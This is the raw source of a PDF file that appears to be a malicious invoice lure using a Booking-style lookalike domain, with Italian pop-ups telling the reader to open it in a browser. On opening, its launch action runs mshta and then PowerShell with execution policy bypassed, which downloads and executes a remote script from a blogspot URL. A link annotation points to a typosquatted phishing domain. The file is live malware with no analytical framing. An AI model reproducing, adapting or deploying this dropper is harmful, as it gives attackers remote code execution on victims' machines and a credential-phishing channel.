%PDF-1.5
1 0 obj
/Contents 2 0 R
/Type /Page
/Resources 
/XObject 
/TLFzWGpuDd 3 0 R
/Parent 4 0 R
/Annots [5 0 R 6 0 R 7 0 R]
/MediaBox [0 0 595 842]
endobj
5 0 obj
/P 1 0 R
/Subtype /Link
/Rect [100 100 200 150]
/AA 
/S /JavaScript
/JS (app.alert\("Lettore non compatibile! Per favore, aprilo nel browser."\);)
endobj
6 0 obj
/BS 
/S /S
/W 0
/P 1 0 R
/Subtype /Screen
/C [0 0 .00392]
/F 4
/IT /Img
/CA 1
/MK 
/BC [0 0 1]
/I 8 0 R
/IF 
/A [0 0]
/Rect [0 0 595 842]
/AP 
/N 9 0 R
/M (D:20250928201544+01'00')
/NM (372d1563-f26a-4b5b-913d-7cce8ce46b7e)
endobj
9 0 obj
/Subtype /Form
/Resources 
/ExtGState 
/ImageOpacity 10 0 R
/XObject 
/IMG 8 0 R
/Filter /FlateDecode
/BBox [0 0 595 842]
/Length 93
/Type /XObject
stream
2P0P0
01R(JU
#3#cK
K>W 
endstream 
endobj
10 0 obj
/Type /ExtGState
/AIS false
/CA 1
/ca 1
endobj
8 0 obj
/Name /IMG
/Subtype /Form
/Filter /FlateDecode
/Type /XObject
/Matrix [1 0 0 1 -518 -733]
/Resources 
/XObject 
/Img 11 0 R
/BBox [0 0 1037 1466]
/Length 35
stream
2406W0
330#9
endstream 
endobj
11 0 obj
/ColorSpace /DeviceRGB
/Subtype /Image
/Height 1466
/Filter /DCTDecode
/Type /XObject
/Width 1037
/BitsPerComponent 8
/Length 49035
stream
JFIF
 $.' ",#
(7),01444
'9=82<.342
!22222222222222222222222222222222222222222222222222
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
	#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
YLlGF
-[^]
uK&EvB
ynmd
_ZjV
zoV_nA
TWR2 
mn---
s,B`
mL!X
&:b8
+kHK
Hgs@
Hgs@
61#C
WQ_[
R_?2
[M$~N
%1H`
|sg=
WvA*
3tE`
wwR5
OnYe
&:`q"
K{O)
O3~0:}
>E\u
>]+QK
y7Kt
n%{s
>JC;
>JC;
k9#T
4,>-x
V52j2
aQ|Z
i^'"
+[yn'q
Q!wv
k/u!u
dTemQ
|R|O
[c>s@
odQedb
_^x!@
/8u^
&_.6
]Niein<
7*do
cem4*
XOgp
>0$N
\&&5
9ZFeuY
)XaN
I?\v
>V6K
r?0+
3^&34
k?H?
endstream 
endobj
7 0 obj
/BS 
/S /U
/W 0
/P 1 0 R
/A 12 0 R
/Subtype /Link
/C [1 0 0]
/F 4
/H /N
/Rect [409.51401 589.40002 489.008 632.703]
/Rotate 0
/AP 
/N 13 0 R
/M (D:20250928201616+01'00')
/NM (d0983435-a914-489b-a63c-4701f055641b)
endobj
13 0 obj
/Subtype /Form
/BBox [408.51401 588.40002 490.008 633.703]
/Length 0
/Type /XObject
/Matrix [1 0 0 1 -408.51401 -588.40002]
stream
endstream 
endobj
12 0 obj
/S /URI
/URI (https://account.bo0king.co/#invoice-1637482117.pdf)
endobj
3 0 obj
/Subtype /Form
/Resources 
/Font 
/F1 14 0 R
/BBox [0 0 595 842]
/Length 0
/Type /XObject
stream
endstream 
endobj
14 0 obj
/Subtype /Type1
/Type /Font
/BaseFont /Helvetica
endobj
2 0 obj
/Filter /FlateDecode
/Length 36
stream
endstream 
endobj
15 0 obj
/S /JavaScript
/JS (app.alert\("Lettore non compatibile! Per favore, aprilo nel browser."\);)
endobj
16 0 obj
/Names [(CloseScript) 15 0 R]
endobj
4 0 obj
/Kids [1 0 R]
/Type /Pages
/Count 1
endobj
17 0 obj
/OpenAction 18 0 R
/Names 
/JavaScript 16 0 R
/Metadata 19 0 R
/Type /Catalog
/Pages 4 0 R
endobj
18 0 obj
/S /Launch
/Win 
/P ("javascript:var abc=['Shell.Application','SHELLEXECUTE','powershell','-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression \(IrM https://potalgonabunbunsed.blogspot.com/compac.pdf\); Start-Sleep -Seconds 9','','open',0],ghi=new ActiveXObject\(abc[0]\);ghi[abc[1]]\(abc[2],abc[3],abc[4],abc[5],abc[6]\);close\(\);")
/F (mshta)
endobj
19 0 obj
/Subtype /XML
/Length 808
/Type /Metadata
stream
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="DynaPDF 4.0.70.201, https://www.dynaforms.com">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about=""
	xmlns:pdf="http://ns.adobe.com/pdf/1.3/"
	xmlns:xmp="http://ns.adobe.com/xap/1.0/"
	xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">
<pdf:Producer>DocFly</pdf:Producer>
<xmp:CreateDate>2025-09-28T19:23:03Z</xmp:CreateDate>
<xmp:MetadataDate>2025-09-28T19:23:03Z</xmp:MetadataDate>
<xmp:ModifyDate>2025-09-28T19:23:03Z</xmp:ModifyDate>
<xmpMM:DocumentID>uuid:effd48a8-631b-3ee3-bfc0-fb1ba3a6f6f0</xmpMM:DocumentID>
<xmpMM:VersionID>1</xmpMM:VersionID>
<xmpMM:RenditionClass>default</xmpMM:RenditionClass>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<?xpacket end="w"?>
endstream 
endobj
20 0 obj
/ModDate (D:20250928192303Z)
/CreationDate (D:20250928192303Z)
/Producer (DocFly)
/Author (
/Title (
endobj
xref
0 21
0000000000 65535 f 
0000000015 00000 n 
0000051174 00000 n 
0000050957 00000 n 
0000051456 00000 n 
0000000184 00000 n 
0000000360 00000 n 
0000050452 00000 n 
0000000996 00000 n 
0000000631 00000 n 
0000000932 00000 n 
0000001242 00000 n 
0000050867 00000 n 
0000050700 00000 n 
0000051101 00000 n 
0000051284 00000 n 
0000051402 00000 n 
0000051515 00000 n 
0000051636 00000 n 
0000052073 00000 n 
0000052966 00000 n 
trailer
/Info 20 0 R
/ID [<2e652470803cf3c49e825e875009fd99> <2e652470803cf3c49e825e875009fd99>]
/Root 17 0 R
/Size 21
startxref
53132
%%EOF
